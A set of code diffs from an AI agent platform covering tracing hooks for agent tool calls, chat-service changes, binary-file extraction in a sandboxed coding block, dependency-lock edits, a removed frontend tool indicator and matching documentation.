if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks:
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
result[event_name].extend(matchers)
return result

View File

@@ -245,16 +245,12 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context) return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt( async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available. """Build the full system prompt including business understanding if available.
Args: Args:
user_id: The user ID for fetching business understanding. user_id: The user ID for fetching business understanding
has_conversation_history: Whether there's existing conversation history. If "default" and this is the user's first session, will use "onboarding" instead.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
Returns: Returns:
Tuple of (compiled prompt string, business understanding object) Tuple of (compiled prompt string, business understanding object)
@@ -270,8 +266,6 @@ async def _build_system_prompt(
if understanding: if understanding:
context = format_understanding_for_prompt(understanding) context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else: else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform" context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -380,6 +374,7 @@ async def stream_chat_completion(
Raises: Raises:
NotFoundError: If session_id is invalid NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
""" """
completion_start = time.monotonic() completion_start = time.monotonic()
@@ -464,9 +459,8 @@ async def stream_chat_completion(
# Generate title for new sessions on first user message (non-blocking) # Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message # Check: is_user_message, no title yet, and this is the first user message
user_messages = [m for m in session.messages if m.role == "user"] if is_user_message and message and not session.title:
first_user_msg = message or (user_messages[0].content if user_messages else None) user_messages = [m for m in session.messages if m.role == "user"]
if is_user_message and first_user_msg and not session.title:
if len(user_messages) == 1: if len(user_messages) == 1:
# First user message - generate title in background # First user message - generate title in background
import asyncio import asyncio
@@ -474,7 +468,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid # Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session # stale data issues when the main flow modifies the session
captured_session_id = session_id captured_session_id = session_id
captured_message = first_user_msg captured_message = message
captured_user_id = user_id captured_user_id = user_id
async def _update_title(): async def _update_title():
@@ -806,9 +800,13 @@ async def stream_chat_completion(
# Build the messages list in the correct order # Build the messages list in the correct order
messages_to_save: list[ChatMessage] = [] messages_to_save: list[ChatMessage] = []
# Add assistant message with tool_calls if any # Add assistant message with tool_calls if any.
# Use extend (not assign) to preserve tool_calls already added by
# _yield_tool_call for long-running tools.
if accumulated_tool_calls: if accumulated_tool_calls:
assistant_response.tool_calls = accumulated_tool_calls if not assistant_response.tool_calls:
assistant_response.tool_calls = []
assistant_response.tool_calls.extend(accumulated_tool_calls)
logger.info( logger.info(
f"Added {len(accumulated_tool_calls)} tool calls to assistant message" f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
) )
@@ -1239,7 +1237,7 @@ async def _stream_chat_chunks(
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000 total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info( logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; " f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}", f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}}, extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
) )
@@ -1410,13 +1408,9 @@ async def _yield_tool_call(
operation_id=operation_id, operation_id=operation_id,
) )
# Save assistant message with tool_call FIRST (required by LLM) # Attach the tool_call to the current turn's assistant message
assistant_message = ChatMessage( # (or create one if this is a tool-only response with no text).
role="assistant", session.add_tool_call_to_current_turn(tool_calls[yield_idx])
content="",
tool_calls=[tool_calls[yield_idx]],
)
session.messages.append(assistant_message)
# Then save pending tool result # Then save pending tool result
pending_message = ChatMessage( pending_message = ChatMessage(

View File

@@ -814,28 +814,6 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id: if task_user_id and user_id != task_user_id:
continue continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream # Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id) stream_key = _get_task_stream_key(task_id)
last_id = "0-0" last_id = "0-0"

View File

@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
name: str name: str
description: str description: str
categories: list[str] categories: list[str]
input_schema: dict[str, Any] = Field( input_schema: dict[str, Any]
default_factory=dict, output_schema: dict[str, Any]
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
required_inputs: list[BlockInputFieldInfo] = Field( required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list, default_factory=list,
description="List of input fields for this block", description="List of required input fields for this block",
) )
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
query: str query: str
usage_hint: str = Field( usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's " default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the fields listed in required_inputs." "'id' field and input_data containing the required fields from input_schema."
) )

View File

@@ -1,4 +1,6 @@
import base64
import json import json
import logging
import shlex import shlex
import uuid import uuid
from typing import Literal, Optional from typing import Literal, Optional
@@ -21,6 +23,11 @@ from backend.data.model import (
) )
from backend.integrations.providers import ProviderName from backend.integrations.providers import ProviderName
logger = logging.getLogger(__name__)
# Maximum size for binary files to extract (50MB)
MAX_BINARY_FILE_SIZE = 50 * 1024 * 1024
class ClaudeCodeExecutionError(Exception): class ClaudeCodeExecutionError(Exception):
"""Exception raised when Claude Code execution fails. """Exception raised when Claude Code execution fails.
@@ -180,7 +187,9 @@ class ClaudeCodeBlock(Block):
path: str path: str
relative_path: str # Path relative to working directory (for GitHub, etc.) relative_path: str # Path relative to working directory (for GitHub, etc.)
name: str name: str
content: str content: str # Text content for text files, empty string for binary files
is_binary: bool = False # True if this is a binary file
content_base64: Optional[str] = None # Base64-encoded content for binary files
class Output(BlockSchemaOutput): class Output(BlockSchemaOutput):
response: str = SchemaField( response: str = SchemaField(
@@ -188,8 +197,11 @@ class ClaudeCodeBlock(Block):
) )
files: list["ClaudeCodeBlock.FileOutput"] = SchemaField( files: list["ClaudeCodeBlock.FileOutput"] = SchemaField(
description=( description=(
"List of text files created/modified by Claude Code during this execution. " "List of files created/modified by Claude Code during this execution. "
"Each file has 'path', 'relative_path', 'name', and 'content' fields." "Each file has 'path', 'relative_path', 'name', 'content', 'is_binary', "
"and 'content_base64' fields. For text files, 'content' contains the text "
"and 'is_binary' is False. For binary files (PDFs, images, etc.), "
"'is_binary' is True and 'content_base64' contains the base64-encoded data."
) )
) )
conversation_history: str = SchemaField( conversation_history: str = SchemaField(
@@ -252,6 +264,8 @@ class ClaudeCodeBlock(Block):
"relative_path": "index.html", "relative_path": "index.html",
"name": "index.html", "name": "index.html",
"content": "<html>Hello World</html>", "content": "<html>Hello World</html>",
"is_binary": False,
"content_base64": None,
} }
], ],
), ),
@@ -272,6 +286,8 @@ class ClaudeCodeBlock(Block):
relative_path="index.html", relative_path="index.html",
name="index.html", name="index.html",
content="<html>Hello World</html>", content="<html>Hello World</html>",
is_binary=False,
content_base64=None,
) )
], # files ], # files
"User: Create a hello world HTML file\n" "User: Create a hello world HTML file\n"
@@ -531,7 +547,6 @@ class ClaudeCodeBlock(Block):
".env", ".env",
".gitignore", ".gitignore",
".dockerfile", ".dockerfile",
"Dockerfile",
".vue", ".vue",
".svelte", ".svelte",
".astro", ".astro",
@@ -540,6 +555,44 @@ class ClaudeCodeBlock(Block):
".tex", ".tex",
".csv", ".csv",
".log", ".log",
".svg", # SVG is XML-based text
}
# Binary file extensions we can read and base64-encode
binary_extensions = {
# Images
".png",
".jpg",
".jpeg",
".gif",
".webp",
".ico",
".bmp",
".tiff",
".tif",
# Documents
".pdf",
# Archives (useful for downloads)
".zip",
".tar",
".gz",
".7z",
# Audio/Video (if small enough)
".mp3",
".wav",
".mp4",
".webm",
# Other binary formats
".woff",
".woff2",
".ttf",
".otf",
".eot",
".bin",
".exe",
".dll",
".so",
".dylib",
} }
try: try:
@@ -564,10 +617,26 @@ class ClaudeCodeBlock(Block):
if not file_path: if not file_path:
continue continue
# Check if it's a text file we can read # Check if it's a text file we can read (case-insensitive)
file_path_lower = file_path.lower()
is_text = any( is_text = any(
file_path.endswith(ext) for ext in text_extensions file_path_lower.endswith(ext) for ext in text_extensions
) or file_path.endswith("Dockerfile") ) or file_path_lower.endswith("dockerfile")
# Check if it's a binary file we should extract
is_binary = any(
file_path_lower.endswith(ext) for ext in binary_extensions
)
# Helper to extract filename and relative path
def get_file_info(path: str, work_dir: str) -> tuple[str, str]:
name = path.split("/")[-1]
rel_path = path
if path.startswith(work_dir):
rel_path = path[len(work_dir) :]
if rel_path.startswith("/"):
rel_path = rel_path[1:]
return name, rel_path
if is_text: if is_text:
try: try:
@@ -576,32 +645,75 @@ class ClaudeCodeBlock(Block):
if isinstance(content, bytes): if isinstance(content, bytes):
content = content.decode("utf-8", errors="replace") content = content.decode("utf-8", errors="replace")
# Extract filename from path file_name, relative_path = get_file_info(
file_name = file_path.split("/")[-1] file_path, working_directory
)
# Calculate relative path by stripping working directory
relative_path = file_path
if file_path.startswith(working_directory):
relative_path = file_path[len(working_directory) :]
# Remove leading slash if present
if relative_path.startswith("/"):
relative_path = relative_path[1:]
files.append( files.append(
ClaudeCodeBlock.FileOutput( ClaudeCodeBlock.FileOutput(
path=file_path, path=file_path,
relative_path=relative_path, relative_path=relative_path,
name=file_name, name=file_name,
content=content, content=content,
is_binary=False,
content_base64=None,
) )
) )
except Exception: except Exception as e:
# Skip files that can't be read logger.warning(f"Failed to read text file {file_path}: {e}")
pass elif is_binary:
try:
# Check file size before reading to avoid OOM
stat_result = await sandbox.commands.run(
f"stat -c %s {shlex.quote(file_path)} 2>/dev/null"
)
if (
stat_result.exit_code != 0
or not stat_result.stdout
):
logger.warning(
f"Skipping binary file {file_path}: "
f"could not determine file size"
)
continue
file_size = int(stat_result.stdout.strip())
if file_size > MAX_BINARY_FILE_SIZE:
logger.warning(
f"Skipping binary file {file_path}: "
f"size {file_size} exceeds limit "
f"{MAX_BINARY_FILE_SIZE}"
)
continue
except Exception: # Read binary file as bytes using format="bytes"
# If file extraction fails, return empty results content_bytes = await sandbox.files.read(
pass file_path, format="bytes"
)
# Base64 encode the binary content
content_b64 = base64.b64encode(content_bytes).decode(
"ascii"
)
file_name, relative_path = get_file_info(
file_path, working_directory
)
files.append(
ClaudeCodeBlock.FileOutput(
path=file_path,
relative_path=relative_path,
name=file_name,
content="", # Empty for binary files
is_binary=True,
content_base64=content_b64,
)
)
except Exception as e:
logger.warning(
f"Failed to read binary file {file_path}: {e}"
)
except Exception as e:
logger.warning(f"File extraction failed: {e}")
return files return files

View File

@@ -897,29 +897,6 @@ files = [
{file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"}, {file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"},
] ]
[[package]]
name = "claude-agent-sdk"
version = "0.1.35"
description = "Python SDK for Claude Code"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "claude_agent_sdk-0.1.35-py3-none-macosx_11_0_arm64.whl", hash = "sha256:df67f4deade77b16a9678b3a626c176498e40417f33b04beda9628287f375591"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:14963944f55ded7c8ed518feebfa5b4284aa6dd8d81aeff2e5b21a962ce65097"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:84344dcc535d179c1fc8a11c6f34c37c3b583447bdf09d869effb26514fd7a65"},
{file = "claude_agent_sdk-0.1.35-py3-none-win_amd64.whl", hash = "sha256:1b3d54b47448c93f6f372acd4d1757f047c3c1e8ef5804be7a1e3e53e2c79a5f"},
{file = "claude_agent_sdk-0.1.35.tar.gz", hash = "sha256:0f98e2b3c71ca85abfc042e7a35c648df88e87fda41c52e6779ef7b038dcbb52"},
]
[package.dependencies]
anyio = ">=4.0.0"
mcp = ">=0.1.0"
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
[package.extras]
dev = ["anyio[trio] (>=4.0.0)", "mypy (>=1.0.0)", "pytest (>=7.0.0)", "pytest-asyncio (>=0.20.0)", "pytest-cov (>=4.0.0)", "ruff (>=0.1.0)"]
[[package]] [[package]]
name = "cleo" name = "cleo"
version = "2.1.0" version = "2.1.0"
@@ -2616,18 +2593,6 @@ http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"] socks = ["socksio (==1.*)"]
zstd = ["zstandard (>=0.18.0)"] zstd = ["zstandard (>=0.18.0)"]
[[package]]
name = "httpx-sse"
version = "0.4.3"
description = "Consume Server-Sent Event (SSE) messages with HTTPX."
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "httpx_sse-0.4.3-py3-none-any.whl", hash = "sha256:0ac1c9fe3c0afad2e0ebb25a934a59f4c7823b60792691f779fad2c5568830fc"},
{file = "httpx_sse-0.4.3.tar.gz", hash = "sha256:9b1ed0127459a66014aec3c56bebd93da3c1bc8bb6618c8082039a44889a755d"},
]
[[package]] [[package]]
name = "huggingface-hub" name = "huggingface-hub"
version = "1.4.1" version = "1.4.1"
@@ -3345,39 +3310,6 @@ files = [
{file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"}, {file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"},
] ]
[[package]]
name = "mcp"
version = "1.26.0"
description = "Model Context Protocol SDK"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca"},
{file = "mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66"},
]
[package.dependencies]
anyio = ">=4.5"
httpx = ">=0.27.1"
httpx-sse = ">=0.4"
jsonschema = ">=4.20.0"
pydantic = ">=2.11.0,<3.0.0"
pydantic-settings = ">=2.5.2"
pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
python-multipart = ">=0.0.9"
pywin32 = {version = ">=310", markers = "sys_platform == \"win32\""}
sse-starlette = ">=1.6.1"
starlette = ">=0.27"
typing-extensions = ">=4.9.0"
typing-inspection = ">=0.4.1"
uvicorn = {version = ">=0.31.1", markers = "sys_platform != \"emscripten\""}
[package.extras]
cli = ["python-dotenv (>=1.0.0)", "typer (>=0.16.0)"]
rich = ["rich (>=13.9.4)"]
ws = ["websockets (>=15.0.1)"]
[[package]] [[package]]
name = "mdurl" name = "mdurl"
version = "0.1.2" version = "0.1.2"
@@ -6062,7 +5994,7 @@ description = "Python for Window Extensions"
optional = false optional = false
python-versions = "*" python-versions = "*"
groups = ["main"] groups = ["main"]
markers = "sys_platform == \"win32\" or platform_system == \"Windows\"" markers = "platform_system == \"Windows\""
files = [ files = [
{file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"}, {file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"},
{file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"}, {file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"},
@@ -7042,28 +6974,6 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"] pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"] sqlcipher = ["sqlcipher3_binary"]
[[package]]
name = "sse-starlette"
version = "3.2.0"
description = "SSE plugin for Starlette"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "sse_starlette-3.2.0-py3-none-any.whl", hash = "sha256:5876954bd51920fc2cd51baee47a080eb88a37b5b784e615abb0b283f801cdbf"},
{file = "sse_starlette-3.2.0.tar.gz", hash = "sha256:8127594edfb51abe44eac9c49e59b0b01f1039d0c7461c6fd91d4e03b70da422"},
]
[package.dependencies]
anyio = ">=4.7.0"
starlette = ">=0.49.1"
[package.extras]
daphne = ["daphne (>=4.2.0)"]
examples = ["aiosqlite (>=0.21.0)", "fastapi (>=0.115.12)", "sqlalchemy[asyncio] (>=2.0.41)", "uvicorn (>=0.34.0)"]
granian = ["granian (>=2.3.1)"]
uvicorn = ["uvicorn (>=0.34.0)"]
[[package]] [[package]]
name = "stagehand" name = "stagehand"
version = "0.5.9" version = "0.5.9"
@@ -8530,4 +8440,4 @@ cffi = ["cffi (>=1.17,<2.0) ; platform_python_implementation != \"PyPy\" and pyt
[metadata] [metadata]
lock-version = "2.1" lock-version = "2.1"
python-versions = ">=3.10,<3.14" python-versions = ">=3.10,<3.14"
content-hash = "942dea6daf671c3be65a22f3445feda26c1af9409d7173765e9a0742f0aa05dc" content-hash = "c06e96ad49388ba7a46786e9ea55ea2c1a57408e15613237b4bee40a592a12af"

View File

@@ -16,7 +16,6 @@ anthropic = "^0.79.0"
apscheduler = "^3.11.1" apscheduler = "^3.11.1"
autogpt-libs = { path = "../autogpt_libs", develop = true } autogpt-libs = { path = "../autogpt_libs", develop = true }
bleach = { extras = ["css"], version = "^6.2.0" } bleach = { extras = ["css"], version = "^6.2.0" }
claude-agent-sdk = "^0.1.0"
click = "^8.2.0" click = "^8.2.0"
cryptography = "^46.0" cryptography = "^46.0"
discord-py = "^2.5.2" discord-py = "^2.5.2"

View File

@@ -20,7 +20,6 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
import { RunAgentTool } from "../../tools/RunAgent/RunAgent"; import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
import { RunBlockTool } from "../../tools/RunBlock/RunBlock"; import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs"; import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
import { GenericTool } from "../../tools/GenericTool/GenericTool";
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput"; import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
// --------------------------------------------------------------------------- // ---------------------------------------------------------------------------
@@ -256,16 +255,6 @@ export const ChatMessagesContainer = ({
/> />
); );
default: default:
// Render a generic tool indicator for SDK built-in
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
if (part.type.startsWith("tool-")) {
return (
<GenericTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
}
return null; return null;
} }
})} })}

View File

@@ -1,63 +0,0 @@
"use client";
import { ToolUIPart } from "ai";
import { GearIcon } from "@phosphor-icons/react";
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
interface Props {
part: ToolUIPart;
}
function extractToolName(part: ToolUIPart): string {
// ToolUIPart.type is "tool-{name}", extract the name portion.
return part.type.replace(/^tool-/, "");
}
function formatToolName(name: string): string {
// "search_docs" → "Search docs", "Read" → "Read"
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
}
function getAnimationText(part: ToolUIPart): string {
const label = formatToolName(extractToolName(part));
switch (part.state) {
case "input-streaming":
case "input-available":
return `Running ${label}`;
case "output-available":
return `${label} completed`;
case "output-error":
return `${label} failed`;
default:
return `Running ${label}`;
}
}
export function GenericTool({ part }: Props) {
const isStreaming =
part.state === "input-streaming" || part.state === "input-available";
const isError = part.state === "output-error";
return (
<div className="py-2">
<div className="flex items-center gap-2 text-sm text-muted-foreground">
<GearIcon
size={14}
weight="regular"
className={
isError
? "text-red-500"
: isStreaming
? "animate-spin text-neutral-500"
: "text-neutral-400"
}
/>
<MorphingTextAnimation
text={getAnimationText(part)}
className={isError ? "text-red-500" : undefined}
/>
</div>
</div>
);
}

View File

@@ -7022,24 +7022,29 @@
"input_schema": { "input_schema": {
"additionalProperties": true, "additionalProperties": true,
"type": "object", "type": "object",
"title": "Input Schema", "title": "Input Schema"
"description": "Full JSON schema for block inputs"
}, },
"output_schema": { "output_schema": {
"additionalProperties": true, "additionalProperties": true,
"type": "object", "type": "object",
"title": "Output Schema", "title": "Output Schema"
"description": "Full JSON schema for block outputs"
}, },
"required_inputs": { "required_inputs": {
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" }, "items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
"type": "array", "type": "array",
"title": "Required Inputs", "title": "Required Inputs",
"description": "List of input fields for this block" "description": "List of required input fields for this block"
} }
}, },
"type": "object", "type": "object",
"required": ["id", "name", "description", "categories"], "required": [
"id",
"name",
"description",
"categories",
"input_schema",
"output_schema"
],
"title": "BlockInfoSummary", "title": "BlockInfoSummary",
"description": "Summary of a block for search results." "description": "Summary of a block for search results."
}, },
@@ -7085,7 +7090,7 @@
"usage_hint": { "usage_hint": {
"type": "string", "type": "string",
"title": "Usage Hint", "title": "Usage Hint",
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs." "default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
} }
}, },
"type": "object", "type": "object",

View File

@@ -16,7 +16,7 @@ When activated, the block:
- Install dependencies (npm, pip, etc.) - Install dependencies (npm, pip, etc.)
- Run terminal commands - Run terminal commands
- Build and test applications - Build and test applications
5. Extracts all text files created/modified during execution 5. Extracts all text and binary files created/modified during execution
6. Returns the response and files, optionally keeping the sandbox alive for follow-up tasks 6. Returns the response and files, optionally keeping the sandbox alive for follow-up tasks
The block supports conversation continuation through three mechanisms: The block supports conversation continuation through three mechanisms:
@@ -42,7 +42,7 @@ The block supports conversation continuation through three mechanisms:
| Output | Description | | Output | Description |
|--------|-------------| |--------|-------------|
| Response | The output/response from Claude Code execution | | Response | The output/response from Claude Code execution |
| Files | List of text files created/modified during execution. Each file includes path, relative_path, name, and content fields | | Files | List of files created/modified during execution. Each file includes path, relative_path, name, content, is_binary, and content_base64 fields. For text files, content contains the text and is_binary is False. For binary files (PDFs, images, etc.), is_binary is True and content_base64 contains the base64-encoded data |
| Conversation History | Full conversation history including this turn. Use to restore context on a fresh sandbox | | Conversation History | Full conversation history including this turn. Use to restore context on a fresh sandbox |
| Session ID | Session ID for this conversation. Pass back with sandbox_id to continue the conversation | | Session ID | Session ID for this conversation. Pass back with sandbox_id to continue the conversation |
| Sandbox ID | ID of the sandbox instance (null if disposed). Pass back with session_id to continue the conversation | | Sandbox ID | ID of the sandbox instance (null if disposed). Pass back with session_id to continue the conversation |

View File

@@ -535,7 +535,7 @@ When activated, the block:
2. Installs the latest version of Claude Code in the sandbox 2. Installs the latest version of Claude Code in the sandbox
3. Optionally runs setup commands to prepare the environment 3. Optionally runs setup commands to prepare the environment
4. Executes your prompt using Claude Code, which can create/edit files, install dependencies, run terminal commands, and build applications 4. Executes your prompt using Claude Code, which can create/edit files, install dependencies, run terminal commands, and build applications
5. Extracts all text files created/modified during execution 5. Extracts all text and binary files created/modified during execution
6. Returns the response and files, optionally keeping the sandbox alive for follow-up tasks 6. Returns the response and files, optionally keeping the sandbox alive for follow-up tasks
The block supports conversation continuation through three mechanisms: The block supports conversation continuation through three mechanisms:
@@ -563,7 +563,7 @@ The block supports conversation continuation through three mechanisms:
|--------|-------------|------| |--------|-------------|------|
| error | Error message if execution failed | str | | error | Error message if execution failed | str |
| response | The output/response from Claude Code execution | str | | response | The output/response from Claude Code execution | str |
| files | List of text files created/modified by Claude Code during this execution. Each file has 'path', 'relative_path', 'name', and 'content' fields. | List[FileOutput] | | files | List of files created/modified by Claude Code during this execution. Each file has 'path', 'relative_path', 'name', 'content', 'is_binary', and 'content_base64' fields. For text files, 'content' contains the text and 'is_binary' is False. For binary files (PDFs, images, etc.), 'is_binary' is True and 'content_base64' contains the base64-encoded data. | List[FileOutput] |
| conversation_history | Full conversation history including this turn. Pass this to conversation_history input to continue on a fresh sandbox if the previous sandbox timed out. | str | | conversation_history | Full conversation history including this turn. Pass this to conversation_history input to continue on a fresh sandbox if the previous sandbox timed out. | str |
| session_id | Session ID for this conversation. Pass this back along with sandbox_id to continue the conversation. | str | | session_id | Session ID for this conversation. Pass this back along with sandbox_id to continue the conversation. | str |
| sandbox_id | ID of the sandbox instance. Pass this back along with session_id to continue the conversation. This is None if dispose_sandbox was True (sandbox was disposed). | str | | sandbox_id | ID of the sandbox instance. Pass this back along with session_id to continue the conversation. This is None if dispose_sandbox was True (sandbox was disposed). | str |